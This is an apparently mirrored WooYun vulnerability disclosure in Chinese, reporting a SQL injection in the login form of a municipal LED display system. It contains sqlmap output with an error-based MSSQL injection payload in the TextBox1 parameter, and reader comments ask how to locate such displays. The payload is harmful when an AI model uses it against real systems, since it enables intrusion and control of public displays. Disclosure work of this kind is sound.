市级LED显示屏信息显示系统SQL注射漏洞（可远程控制LED）

2015年7月7日13:57:12评论251 views字数 245阅读0分49秒阅读模式

摘要

2014-10-13：细节已通知厂商并且等待厂商处理中
2014-10-15：厂商已经确认，细节仅向厂商公开
2014-10-25：细节向核心白帽子及相关领域专家公开
2014-11-04：细节向普通白帽子公开
2014-11-14：细节向实习白帽子公开
2014-11-25：细节向公众公开

漏洞概要关注数(26) 关注此漏洞

缺陷编号： WooYun-2014-78964

漏洞标题：市级LED显示屏信息显示系统SQL注射漏洞（可远程控制LED）

漏洞作者：魇

提交时间： 2014-10-13 14:05

公开时间： 2014-11-25 14:06

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

那么问题来了...
LED 哪家强？

详细说明：

http://**.**.**.**/bugs/wooyun-2014-076215

前人漏洞..看到一个弱口令竟然前台加精..略讶异于是看了下，表示我这能给前台就行

**.**.**.**:8888/main.aspx

“登陆处post注射” TextBox1参数存在注入

code 区域

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: POST
 Parameter: TextBox1
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: __VIEWSTATE=/wEPDwUJNTUyNjI3NDI4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3R
 CYWNrS2V5X18WAgUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjJygpamJGdz4YCN7lpdiG1ys7PZqg=
 =&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBgLOsYjhDwLs0bLrBgLs0fbZDA
 Ls0Yq1BQLSwpnTCALSwtXkAldceanpG52LNpx63yyJ+5PopWeN&TextBox1=admin' AND 1318=CONV
 ERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(100)+CHAR(104)+CHAR(113)+(SELECT (CASE
 WHEN (1318=1318) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(102)+CHAR(105)
 +CHAR(110)+CHAR(113)))-- itwg&TextBox2=admin&TextBox3=11&ImageButton1.x=50&Image
 Button1.y=10
 ---
 [12:35:41] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2005
 [12:35:41] [WARNING] HTTP error codes detected during run:
 500 (Internal Server Error) - 1 times
 [12:35:41] [INFO] fetched data logged to text files under 'C:/Python27/sqlmap/ou
 tput/**.**.**.**'
 
 [*] shutting down at 12:35:41
 
 
 C:/Python27/sqlmap>

漏洞证明：

修复方案：

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2014-10-15 17:53

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2014-10-11 18:45 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心，方得始终。)

1

我感觉这家还是不错的，多少钱一学期？

1# 回复此人
2014-10-15 19:00 | 安然意境 ( 普通白帽子 | Rank:194 漏洞数:83 | 暗室中很难找到黑猫，尤其当里面根本没猫的...)

0

LED显示屏彻底火了

2# 回复此人
2014-10-16 09:19 | 一只猿 ( 普通白帽子 | Rank:560 漏洞数:98 | 硬件与无线通信研究方向)

0

mark

3# 回复此人
2014-11-25 14:22 | 火焰真菌 ( 实习白帽子 | Rank:51 漏洞数:17 | 123)

1

求大神带我装逼

4# 回复此人
2014-11-26 07:21 | 暧昧 ( 路人 | Rank:6 漏洞数:3 | 此号乃是吾用来装孙子也)

1

话说除了政府led 那些广场的那些led是怎么控制的还有个人的有物理牛么是用硬件控制还是用网站这样形式来控制的

5# 回复此人
2014-12-19 17:52 | 半世倾尘 ( 路人 | Rank:29 漏洞数:8 | 努力)

1

怎么往出找这led的地址啊。，。

6# 回复此人
2015-01-13 13:31 | 小r00to1 ( 普通白帽子 | Rank:183 漏洞数:59 )

1

是不是我提醒了什么东西

7# 回复此人

漏洞概要 关注数(26) 关注此漏洞

缺陷编号： WooYun-2014-78964

漏洞标题： 市级LED显示屏信息显示系统SQL注射漏洞（可远程控制LED）

相关厂商： cncert国家互联网应急中心

漏洞作者： 魇

提交时间： 2014-10-13 14:05

公开时间： 2014-11-25 14:06

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(26) 关注此漏洞

漏洞标题：市级LED显示屏信息显示系统SQL注射漏洞（可远程控制LED）

漏洞作者：魇

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

版权声明：转载请注明来源魇@乌云

漏洞评价(少于3人评价):

登陆后才能进行评分